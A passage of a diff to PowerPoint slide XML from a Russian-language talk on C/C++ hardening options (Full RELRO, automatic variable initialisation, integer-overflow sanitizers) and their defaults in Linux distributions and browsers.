+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardened </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> :(</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Debian и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ull RELRO</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В пакетах Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> дефолтно не включён</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён по дефолту в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>BUILD.gn</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>flags.configure</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -35894,7 +35826,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35921,7 +35853,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35953,7 +35885,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35970,20 +35902,16 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Автоинициализация</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35993,7 +35921,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36007,13 +35935,77 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+              <a:t>Опции линкера для включения </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>partial RELRO</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Debian и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -36021,162 +36013,85 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в компиляторе в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Скрытый флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>initiall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ull RELRO</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в пакетах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
+              <a:t>В пакетах Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> дефолтно не включён</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дискуссия в трекере </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu (</a:t>
+              <a:t>Включён по дефолту в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>#1972043</a:t>
+              <a:t>BUILD.gn</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Chromium #</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>40633061</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>flags.configure</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не включён в Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Trivial Auto Var Init Experiments</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android user</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>- и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>kernelspace</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="sv-SE" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>System hardening in Android 11</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36185,7 +36100,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36212,7 +36127,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36244,7 +36159,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36262,7 +36177,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Целочисленные переполнения</a:t>
+              <a:t>Автоинициализация</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -36284,7 +36199,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAADEE4F-0571-446A-90C7-1E44732CD1C9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36298,276 +36213,176 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="92500"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в компиляторе в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Скрытый флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-trap=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow</a:t>
-            </a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>initiall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>integer</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в пакетах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ещё раз отметим что </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrapv</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>неработоспособна</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-minimal-runtime</a:t>
+              <a:t>Дискуссия в трекере </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>#1972043</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Chromium #</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>40633061</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендую также добавлять </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=integer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(может потребоваться добавить некоторые </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>хедеры в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>blacklist</a:t>
+              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока не включён в Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Trivial Auto Var Init Experiments</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не используется в </a:t>
-            </a:r>
-            <a:r>
